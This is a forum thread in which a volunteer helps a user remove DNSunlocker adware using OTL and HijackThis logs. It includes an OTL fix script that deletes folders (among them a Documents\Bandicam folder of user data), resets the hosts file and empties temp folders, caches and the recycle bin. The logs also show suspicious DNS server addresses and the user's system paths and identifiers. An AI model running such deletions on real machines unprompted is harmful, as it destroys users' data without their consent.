"{9D56775A-93F3-44A3-8092-840E3826DE30}" = Windows Live Mail
"{A726AE06-AAA3-43D1-87E3-70F510314F04}" = Windows Live Writer
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common
"{AAAFC670-569B-4A2F-82B4-42945E0DE3EF}" = Windows Live Writer
"{AC76BA86-0804-1033-1959-001824147215}" = Adobe Refresh Manager
"{AC76BA86-7AD7-FFFF-7B44-AA0000000001}" = Adobe Reader X (10.1.15) MUI
"{AFA1153A-F547-409B-B837-3A0D6C5A3FEC}" = Apple Application Support(32 ビット)
"{B175520C-86A2-35A7-8619-86DC379688B9}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030
"{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030
"{C2695E83-CF1D-43D1-84FE-B3BEC561012A}" = Shredder
"{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" = Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030
"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform
"{D0B44725-3666-492D-BEF6-587A14BD9BD9}" = MSVCRT_amd64
"{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}" = NTI Media Maker 9
"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform
"{DDA3C325-47B2-4730-9672-BF3771C08799}_is1" = XMedia Recode バージョン 3.1.9.0
"{DECDCB7C-58CC-4865-91AF-627F9798FE48}" = Windows Live Mesh
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E3739848-5329-48E3-8D28-5BBD6E8BE384}" = CyberLink MediaEspresso
"{E5B21F11-6933-4E0B-A25C-7963E3C07D11}" = Windows Live Messenger
"{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}" = Cisco PEAP Module
"{EE408577-9C0E-4E5F-BCB2-DB5B3A220958}" = Windows Live UX Platform Language Pack
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}" = Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219
"{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}" = Intel(R) Processor Graphics
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"{F8A9085D-4C7A-41a9-8A77-C8998A96C421}" = Intel(R) Control Center
"{FCB3772C-B7D0-4933-B1A9-3707EBACC573}" = Intel(R) OpenCL CPU Runtime
"{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
"Acer Registration" = Acer Registration
"Acer Screensaver" = Acer ScreenSaver
"Acer Welcome Center" = Welcome Center
"Adobe AIR" = Adobe AIR
"Adobe Flash Player ActiveX" = Adobe Flash Player 18 ActiveX
"Adobe Flash Player NPAPI" = Adobe Flash Player 18 NPAPI
"Battlelog Web Plugins" = Battlelog Web Plugins
"Google Chrome" = Google Chrome
"Identity Card" = Identity Card
"InstallShield_{0B61BBD5-DA3C-409A-8730-0C3DC3B0F270}" = Acer Backup Manager
"InstallShield_{17DF9714-60C9-43C9-A9C2-32BCAED44CBE}" = MyWinLocker Suite
"InstallShield_{D3D5C4E8-040F-4C6F-8105-41D43CF94F44}" = NTI Media Maker 9
"InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}" = CyberLink MediaEspresso
"Jane Style_is1" = Jane Style Version 3.83
"Janetter2_is1" = Janetter 4.3.0.2
"League of Legends 3.0.1" = League of Legends
"LManager" = Launch Manager
"LogMeIn Hamachi" = LogMeIn Hamachi
"Mozilla Firefox 37.0.1 (x86 ja)" = Mozilla Firefox 37.0.1 (x86 ja)
"MozillaMaintenanceService" = Mozilla Maintenance Service
"Origin" = Origin
"PunkBusterSvc" = PunkBuster Services
"RED BELT SKIN Series" = RED BELT SKIN Series
"Steam" = Steam
"Steam App 105600" = Terraria
"Steam App 207610" = The Walking Dead
"Steam App 211820" = Starbound
"Steam App 22370" = Fallout 3 - Game of the Year Edition
"Steam App 261030" = The Walking Dead: Season Two
"Steam App 332310" = LEGO® Worlds
"Steam App 367540" = Starbound - Unstable
"Steam App 49520" = Borderlands 2
"Steam App 550" = Left 4 Dead 2
"Steam App 620" = Portal 2
"VLC media player" = VLC media player
"WinLiveSuite" = Windows Live Essentials
"らくらく無線スタートEX" = らくらく無線スタートEX

[color=#E56717]========== HKEY_USERS Uninstall List ==========[/color]

[HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

[color=#E56717]========== HKEY_USERS Uninstall List ==========[/color]

[HKEY_USERS\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]

[color=#E56717]========== HKEY_USERS Uninstall List ==========[/color]

[HKEY_USERS\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{1EAC1D02-C6AC-4FA6-9A44-96258C37C814na}_is1" = World of Warships
"Dropbox" = Dropbox
"Hangame.com" = Hangame
"OneDriveSetup.exe" = Microsoft OneDrive
"TeamSpeak 3 Client" = TeamSpeak 3 Client
"UnityWebPlayer" = Unity Web Player
"Vivaldi" = Vivaldi

[color=#E56717]========== Last 20 Event Log Errors ==========[/color]

[ Application Events ]
Error - 2015/06/21 22:59:11 | Computer Name = 【ユーザー名】 | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b
障害が発生しているモジュール名:
Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b 例外コード: 0xc0000005 障害オフセット: 0x006ddf7b
障害が発生しているプロセス
ID: 0x1e50 障害が発生しているアプリケーションの開始時刻: 0x01d0ac96fef87d55 障害が発生しているアプリケーション パス: C:\Program
Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe 障害が発生しているモジュール パス:
C:\Program Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe レポート ID:
a7c2b4a2-188a-11e5-9a33-208984cf2c64

Error - 2015/06/21 23:12:59 | Computer Name = 【ユーザー名】 | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b
障害が発生しているモジュール名:
Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b 例外コード: 0xc0000005 障害オフセット: 0x006ddf7b
障害が発生しているプロセス
ID: 0x2050 障害が発生しているアプリケーションの開始時刻: 0x01d0ac99411def0b 障害が発生しているアプリケーション パス: C:\Program
Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe 障害が発生しているモジュール パス:
C:\Program Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe レポート ID:
957a364e-188c-11e5-9a33-208984cf2c64

Error - 2015/06/21 23:25:11 | Computer Name = 【ユーザー名】 | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: igfxext.exe、バージョン: 8.15.10.2712、タイム スタンプ: 0x4f710c3a
障害が発生しているモジュール名:
ntdll.dll、バージョン: 6.1.7601.18869、タイム スタンプ: 0x556366f2 例外コード: 0xc0000374 障害オフセット: 0x00000000000bfc22
障害が発生しているプロセス
ID: 0xdb4 障害が発生しているアプリケーションの開始時刻: 0x01d0ac9b0888cab8 障害が発生しているアプリケーション パス: C:\Windows\system32\igfxext.exe
障害が発生しているモジュール
パス: C:\Windows\SYSTEM32\ntdll.dll レポート ID: 496ea743-188e-11e5-b916-208984cf2c64

Error - 2015/06/21 23:25:13 | Computer Name = 【ユーザー名】 | Source = WinMgmt | ID = 10
Description =

Error - 2015/06/21 23:27:14 | Computer Name = 【ユーザー名】 | Source = McLogEvent | ID = 5022
Description = MCSCAN32 Engine Initialisation failed. Engine returned error : 1

Error - 2015/06/21 23:37:40 | Computer Name = 【ユーザー名】 | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b
障害が発生しているモジュール名:
Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b 例外コード: 0xc0000005 障害オフセット: 0x006ddf7b
障害が発生しているプロセス
ID: 0xaf4 障害が発生しているアプリケーションの開始時刻: 0x01d0ac9c9d89d1b3 障害が発生しているアプリケーション パス: C:\Program
Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe 障害が発生しているモジュール パス:
C:\Program Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe レポート ID:
07db9bb4-1890-11e5-b916-208984cf2c64

Error - 2015/06/21 23:43:54 | Computer Name = 【ユーザー名】 | Source = Application Error | ID = 1000
Description = 障害が発生しているアプリケーション名: Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b
障害が発生しているモジュール名:
Fallout3.exe、バージョン: 1.7.0.3、タイム スタンプ: 0x4a40f18b 例外コード: 0xc0000005 障害オフセット: 0x006ddf7b
障害が発生しているプロセス
ID: 0x1b50 障害が発生しているアプリケーションの開始時刻: 0x01d0ac9d9da3ac46 障害が発生しているアプリケーション パス: C:\Program
Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe 障害が発生しているモジュール パス:
C:\Program Files (x86)\Steam\steamapps\common\Fallout 3 goty\Fallout3.exe レポート ID:
e726ff80-1890-11e5-b916-208984cf2c64

Error - 2015/06/22 9:04:52 | Computer Name = 【ユーザー名】 | Source = Application Hang | ID = 1002
Description = プログラム starbound_opengl.exe バージョン 0.9.0.0 は Windows との対話を停止し、終了しました。問題に関する詳細な情報があるかどうかを確認するには、アクション
センター コントロール パネルで、問題の履歴をクリックしてください。 プロセス ID: 1fd4 開始時刻: 01d0acebc2eca02b 終了時刻: 7 アプリケーション
パス: C:\Program Files (x86)\Steam\steamapps\common\Starbound - Unstable\win64\starbound_opengl.exe

レポート
ID: 23d6489c-18df-11e5-b916-208984cf2c64

Error - 2015/06/22 9:05:26 | Computer Name = 【ユーザー名】 | Source = Application Hang | ID = 1002
Description = プログラム starbound_opengl.exe バージョン 0.9.0.0 は Windows との対話を停止し、終了しました。問題に関する詳細な情報があるかどうかを確認するには、アクション
センター コントロール パネルで、問題の履歴をクリックしてください。 プロセス ID: 2160 開始時刻: 01d0acebbf329773 終了時刻: 33 アプリケーション
パス: C:\Program Files (x86)\Steam\steamapps\common\Starbound - Unstable\win64\starbound_opengl.exe

レポート
ID: 57c347c0-18df-11e5-b916-208984cf2c64

Error - 2015/06/22 10:28:30 | Computer Name = 【ユーザー名】 | Source = Application Hang | ID = 1002
Description = プログラム Janetter.exe バージョン 4.2.3.0 は Windows との対話を停止し、終了しました。問題に関する詳細な情報があるかどうかを確認するには、アクション
センター コントロール パネルで、問題の履歴をクリックしてください。 プロセス ID: ebc 開始時刻: 01d0ac9e17f431a4 終了時刻: 76 アプリケーション
パス: C:\Program Files (x86)\Janetter2\bin\Janetter.exe レポート ID: f1112d56-18ea-11e5-b916-208984cf2c64


[ Broadcom Wireless LAN Events ]
Error - 2014/11/23 0:12:08 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 13:12:03, Sun, Nov 23, 14 Error - Unable to gain access to user store


Error - 2014/12/03 3:42:45 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 16:42:39, Wed, Dec 03, 14 Error - Unable to gain access to user store


Error - 2014/12/03 18:42:24 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 07:42:19, Thu, Dec 04, 14 Error - Unable to gain access to user store


Error - 2015/01/23 14:19:36 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 03:19:34, Sat, Jan 24, 15 Error - Unable to gain access to user store


Error - 2015/01/28 17:49:46 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 06:49:44, Thu, Jan 29, 15 Error - Unable to gain access to user store


Error - 2015/02/11 9:25:29 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 22:25:27, Wed, Feb 11, 15 Error - Unable to gain access to user store


Error - 2015/02/22 7:50:39 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 20:50:36, Sun, Feb 22, 15 Error - Unable to gain access to user store


Error - 2015/04/14 10:47:34 | Computer Name = 【ユーザー名】 | Source = WLAN-Tray | ID = 0
Description = 23:47:33, Tue, Apr 14, 15 Error - Unable to gain access to user store


[ System Events ]
Error - 2015/09/11 2:30:49 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 7:31:07 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 12:31:27 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 14:20:31 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 14:20:57 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 17:31:45 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/11 22:32:02 | Computer Name = 【ユーザー名】 | Source = DCOM | ID = 10005
Description =

Error - 2015/09/11 22:32:02 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/12 3:32:20 | Computer Name = 【ユーザー名】 | Source = Service Control Manager | ID = 7000
Description = TrustedInstaller サービスを、次のエラーが原因で開始できませんでした: %%2

Error - 2015/09/12 4:20:03 | Computer Name = 【ユーザー名】 | Source = bowser | ID = 8003
Description =


< End of report >
  • あすとろ
  • 2015/09/15 (Tue) 20:56:11
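Edit the user name, then apply the fix with OTL
Thank you for the quick reply.
I have also looked at the Extras log.
Now let's clean up what OTL found, this time from within OTL itself.

I am putting a script at the end of this reply, so copy the whole thing, paste it into a Windows Notepad file, and save it.
However, replace every occurrence of 【ユーザー名】 with the actual user name.

When that is ready, restart the PC in Safe Mode again and launch OTL.
Once it has started, paste the script into the box at the bottom of the OTL window, and this time press "Run fix" (the button with red text).
This starts the fix in OTL.

Wait a while, and once the fix is done, restart the PC in normal mode; an OTL log should appear again, so save it. After watching how things go for a while, please reply with a status report along with the OTL log.
The OTL script is below. Copy everything except the dashed lines (-----) and paste it into OTL to do the work.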
------------------------------------------
:OTL
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/ja-jp/?ocid=iehp
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = ja-JP
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\..\SearchScopes,DefaultScope = {C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}
IE - HKU\S-1-5-21-2268393351-900118556-74167924-1000\..\SearchScopes\{C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}: "URL" = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
CHR - Extension: No name found = C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\
O2:[b]64bit:[/b] - BHO: (DOwnnSave) - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave\v6zSk4iGH18oQh.x64.dll File not found
[2015/09/06 15:53:36 | 000,000,000 | ---D | C] -- C:\Users\kaito\AppData\Roaming\Super PC Cleaner
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Documents\Bandicam

:Files
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg
O2:[b]64bit:[/b] - BHO: (DOwnnSave) - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave
C:\Users\kaito\AppData\Roaming\Super PC Cleaner
C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT
C:\Users\【ユーザー名】\Documents\Bandicam

:Commands
[purity]
[resethosts]
[emptytemp]
[createrestorepoint]
[reboot]
------------------------------------------
  • 悪代官
  • 2015/09/15 (Tue) 21:45:50
Re: DNSunlocker infection
The scan has finished. As a status update, the PC is working without problems, no different from before.

I'll paste the log below.

All processes killed
========== OTL ==========
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}\ not found.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86}\ not found.
HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache| /E : value set successfully!
HKU\S-1-5-21-2268393351-900118556-74167924-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache AcceptLangs| /E : value set successfully!
HKEY_USERS\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Internet Explorer\SearchScopes\\DefaultScope| /E : value set successfully!
Registry key HKEY_USERS\S-1-5-21-2268393351-900118556-74167924-1000\Software\Microsoft\Internet Explorer\SearchScopes\{C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C4AA6A22-6DB2-4D2C-AC97-E1D8FAC41939}\ not found.
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\_platform_specific\x86-64_ja folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\_platform_specific folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\_metadata folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0\audio folder moved successfully.
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg\0.3.0.5_0 folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Super PC Cleaner\WL folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\Super PC Cleaner folder moved successfully.
C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7\x64\x64 folder moved successfully.
C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7\x64 folder moved successfully.
C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7 folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT\BANDICAM folder moved successfully.
C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT folder moved successfully.
C:\Users\【ユーザー名】\Documents\Bandicam folder moved successfully.
========== FILES ==========
C:\Users\【ユーザー名】\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg folder moved successfully.
Invalid Switch: b] - BHO: (DOwnnSave) - {7F6EE392-0640-444B-B105-4FDE528B793E} - C:\Program Files (x86)\DOwnnSave
File\Folder C:\Users\【ユーザー名】\AppData\Roaming\Super PC Cleaner not found.
File\Folder C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7 not found.
File\Folder C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT not found.
File\Folder C:\Users\【ユーザー名】\Documents\Bandicam not found.
========== COMMANDS ==========
C:\Windows\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYTEMP]

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: 【ユーザー名】
->Temp folder emptied: 156068 bytes
->Temporary Internet Files folder emptied: 33191 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 2796055 bytes
->Google Chrome cache emptied: 373887843 bytes
->Flash cache emptied: 0 bytes

User: Public

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 637179 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 50503 bytes
RecycleBin emptied: 7668795 bytes

Total Files Cleaned = 367.00 mb

Unable to start System Restore Service. Error code 1084

OTL by OldTimer - Version 3.2.69.0 log created on 09162015_184146

Files\Folders moved on Reboot...
C:\Users\【ユーザー名】\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...
  • あすとろ
  • 2015/09/16 (Wed) 18:46:10
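Time to recheck the overall state
Thank you for doing the work and reporting back.

>As a status update, the PC is working without problems, no different from before.

Yes, I have looked at the log as well, and it seems OTL has dealt with what it could.

Now, once you have tidied OTL away following the explanation given when you installed it, we will review the overall state from the logs.
Please also take the CC logs for each tab, the install information log and the HJT log again, and show them to me once more.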
  • 悪代官
  • 2015/09/16 (Wed) 21:08:19
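Re: DNSunlocker infection
>Yes, I have looked at the log as well, and it seems OTL has dealt with what it could.
I'm a little relieved that this seems to be heading toward a resolution.

I'll paste the logs now.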


hjt----------------------

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 23:02:05, on 2015/09/16
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 40.0.3 (x86 ja)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe
C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe

F2 - REG:system.ini: UserInit=userinit.exe
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\45.0.2454.17\remoting_host.exe
